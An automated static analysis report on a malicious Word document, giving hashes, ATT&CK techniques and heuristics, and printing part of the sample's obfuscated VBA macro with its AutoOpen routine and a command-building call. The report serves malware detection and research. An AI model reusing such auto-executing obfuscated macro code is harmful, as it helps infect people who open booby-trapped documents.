Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2374dbfc77a0b148…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 124.4 KB
Created: 2018-09-28 19:50:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 0a8c1f35ebf0f55a44628e91cd7e9fbb
SHA-1: d3329276fea11a5dc60e3bd14c810bdbe19833d8
SHA-256: 2374dbfc77a0b14843a75e4f8358aa6b0c6b96482fd4231639194ee310cea943
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro uses a Shell() call, indicating an attempt to execute external commands or download additional payloads. The presence of a 'Password-protected archive handoff' heuristic suggests the document may be part of a multi-stage attack designed to bypass security gateways by keeping the payload encrypted until it reaches the user.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6700702-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6700702-0
  • VBA macros detected [medium] (OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA code contains a Shell() call
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen subroutine
  • Password-protected archive handoff [high] (SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro-execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 70122 bytes
  SHA-256: e2af85491cc21c9c1ba42b0b96029f8f96b24e08d972f88b328eaf752d081a70

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ikXVjZibrS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim VVVbzf(2)
VVVbzf(0) = InStrRev(ZRIHi + ZmoHcTJtVwuNUPZtma + ZsHEoT, uwkkoSI + LFbGzlonMsioWSOOUOVw + EvcjznH) + InStrRev(bVTOaH + BHqDFcGWDuNIqWvqzFq + rSuiLDo, zTpTfwSw + jMdOlMCfRjKLiEMzuSPnYI + zqwXDc) + InStrRev(ZNEJWJMI + pIHPTkwiITFPtEB + chvtfwiY, GGwPTNM + knEuHVHwudEwjHNNj + MWwCMaq) + InStrRev(hWizG + oXirkdwhhCiLAwwChwFJaRL + hjaqIUYq, siYOGfY + BjYbrfqjOEZZkCzLaqbH + OsJjwd)
VVVbzf(1) = InStrRev(jrMJF + RfobATzVPshlZbf + njGlkBQ, pqIYBJKn + VvunUFFqwSldCFXDrzmdE + jAKXbl) + InStr(hhstmff + raEMGSiYjotiRqHEfEWjq + XirnYL, mibLdhjz + GtwPCqIajjUtkvzjwL + jfLjk)
   Dim EzwCjY(2)
EzwCjY(0) = InStrRev(BTLQV + UtuXXoSrZTOijFctcXAZo + UZojaun, VGjFsQ + cMKHWYFobKUGKqcO + zYbmT) + InStrRev(WXBLqtwb + zXQblTNvBAZOQvdojV + jjRazs, fISirM + FwYXboIlImwSnTzhrUsdVV + QwlLrL)
EzwCjY(1) = InStrRev(kzfwumI + GcFrpPktrtMVCCwMAzvmDE + PwnFL, PsXdbjB + TWVPuzaGwptLmGKUv + hIinJbq) + InStrRev(wfiShiS + zMzOOtDUqUWjhoNhHS + BRqNcWV, zivfmSuo + GzkISOlsVlbbzzYf + zmjWwao) + InStrRev(SsXMRl + XENlcCwNTEpVIaGND + iarXCt, KqjoB + uXDiakkFAzjKXNXCWn + fIQFJ) + InStrRev(hUhuf + ZKkbpXFKRVASzEaASX + izWwT, UGbOo + vzIhawkJvqQUdUmCAGdT + cIzPY)
   Dim wEfij(1)
wEfij(0) = InStr(HcFzPk + RkNpsmSurdoOkFPEii + iYNnXa, szUObSvA + mlnGJHlAsAjZVjQiwKr + kquVPnJO) + InStr(sDbYPF + aGuLYkljiWlGrVSNBWNj + IrZuK, iYRpAZ + jKDirKwNkDwsNWIzQt + YczDi) + InStrRev(qwAES + EuiwsKHEjTSsaCP + iBuibVNt, nwDDSNUR + ARYQjZhwVzpiCAzWX + AHtXFz) + InStrRev(FkOVwNd + BvfvlwwAZQNVvdCkXMUZhT + bZPQYW, bSVPIu + ajQkokNzNFihbUlXabIr + aBjPBH)
   Dim UVRit(2)
UVRit(0) = InStrRev(qzimkH + zhowilSWMLpiTsiUYT + PaGwIu, itQfYPin + DvRhYuWXuCnRsZYbsc + UjvNo) + InStrRev(KuupQHGh + ZnWTqcYjPqJMhmzBdjiS + HsbbpCr, SpCqio + FnzAiNilIfYjrUizBzuNw + ORcwTMKr)
UVRit(1) = InStrRev(hjZitpU + ziaUNvpRrLMlzQJ + TOoPpHzJ, HZTmq + zOpXXtzRjXofdEsjtLfGG + JklGOV) + InStrRev(SviRv + zkacVpdbOuHVbRIDjPjwSB + KkNnwO, ufiRij + sUOBjnzjslmIbDVT + bzsPOX)
   Dim ztVaa(1)
ztVaa(0) = InStrRev(nTSHUB + jpiquLshwWqRazLoQXfMj + aFujFNT, aLTsDF + dDJGMWGnMDEEdzLJvArJWVI + AhlLT) + InStrRev(fViOins + PrOwMiTSInmlEAGnNb + NuTqiWD, hHGiu + swSsKDzltKihFzaACsRE + BjEmjH) + InStrRev(SuOIAa + iIlLVaBjjYtYvbuJXswCmA + KiRWfq, JSlta + FziQBWUnWRmEzLLLr + MsCSkS) + InStrRev(jitYsED + rrOizEAaDSZnTqlqO + BsDnitj, wcETA + MiwSKOJBTGECVZFpWa + KUjCWzd)
   Dim TYDGY(1)
TYDGY(0) = InStrRev(nQkJzNGE + wIXCOJMqRWVlVvNThS + KomkJtD, PjROFBFP + iobRfPfmtlvNCcbYDYnw + BDPFt) + InStr(riLsj + ViGlaTWPmsqnPurwM + QjYlh, rkcsTDY + WWlioNGdMDOQJdJNZMo + oXCQuJ)
   Dim jEYLQQ(2)
jEYLQQ(0) = InStrRev(itmOnbo + GfNKRLznzaMnMXYzuCEIi + jaQXtuUn, hcPtZLcT + vhOpUDrjBWjHdiPEfrzVY + JDVqcpdc) + InStrRev(LaDqDiGo + UlPzcNPVvLpwdtnZhGflfNI + cJsjzu, oWOOaH + nWcawQRQuqpzkmBsYDi + HVwub)
jEYLQQ(1) = InStrRev(wkprq + RMscRCDYEjuNZPJiYSaRXo + sEJsvnOj, aNqAbzu + zhjPziMTrvUnLbOLoH + ioRvnYrc) + InStrRev(HGFIp + ijvslnzboAVazrBaf + icOXIf, DlBAG + zzdiwjrsoqOHPhY + TdNDHsSl)
BFaHamFr (KeyString(hIcsk + LuobGC + 17 + 5 + 45 + AbKclM + iSdwpB) + rMMnVrm + foLprjBT + KeyString(nOcrqVqw + whKZE + 19 + 6 + 52 + pUDIofmG + dmjciFEh) + ZjkwB + doLCODdi + jwjOQSEuWKo + vWwjBvn + PzuuDzA + wlViR)
   Dim uvWTcw(2)
uvWTcw(0) = InStrRev(UjZWEtw + HbiOUSjjwwimJuY + OFSWJZUX, SAILbpQ + sEmtziCFnMJVIBIMEujuC + wZvCwtL) + InStrRev(mbMSrGLP + bwsWPZEifIJjvdRCrTwY + UpqUwiUL, hGCjdP + RocsQzLtNszdXhkqjjzoww + ZalZbdRH)
uvWTcw(1) = InStrRev(cYsIUo + nsJYilYFBUzitrCIoQUMQ + TLwaL, fKjdAwz + YQmVrhjWSjSBtNcShai + RwiKj) + InStr(IHNvw + KkdPEscPrzknUhwaaEtzWCl + LoXkPX, DLazkCU + vzlbICVDlQkHjEEqTP + BzvRSd)
   Dim rlSmPv(2)
rlSmPv(0) = InStrRev(rGBEwBF + tKsOrNafIfdkKOQAsJz + ZzCPVQHo, tWhdAX + ImBIGsiikFrkuptKLJqBq + QmpkQc) + InStrRev(rpvQq + niWjdlnloGNjzRwrfGs + cqhCtA, FpWHf + dRwEvKPFZDlRwukCHnD + kQCHraJF) + InStrRev(ONIoC
... (truncated)